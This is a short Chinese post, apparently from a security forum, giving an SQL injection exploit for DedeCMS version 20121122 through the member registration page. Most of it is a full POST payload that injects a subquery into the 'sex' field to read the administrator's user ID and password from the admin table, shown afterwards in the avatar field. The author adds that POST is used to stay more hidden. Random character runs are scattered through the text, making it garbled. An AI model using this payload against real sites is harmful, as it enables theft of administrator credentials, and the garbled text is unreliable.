dedecms版本 20121122; C; Z# P4 N: o6 y3 k, o
Z4 ^' [# d/ Z* u$ t/ s1 B需要magic_quotes_gpc=Off0 ]0 Y; @8 I' |: z, X: u E
# A9 X* X- P2 b* {应该是没有什么大危害的漏洞.$ U9 }' t& R2 M% ?7 l: f& w
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
; L' w5 g* I* A
+ p: r5 O' t; N% A9 J! z a是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
+ F/ h6 B0 T( s) ZPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
5 Y3 M" t0 G, i- H% M# N; o' W8 ^3 ^6 F. K, j( z+ r
http:///de/member/reg_new.php
9 v( a1 d/ w' [2 f" \ c. |2 I
0 Z! X c3 |0 V, A! q8 K8 M, X @POST0 t# m" l; j$ [8 R8 \# ^
' `9 ~) ^$ L& G1 m4 J( z5 {dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=! H: X9 U8 g4 Y$ W+ ]- b3 k
) C1 h8 `* _/ F( _成功注册后,头像处里面有好玩的信息.7 X5 C* B7 I3 S! q5 h4 X8 d
" I1 G. m: z8 c6 Z
|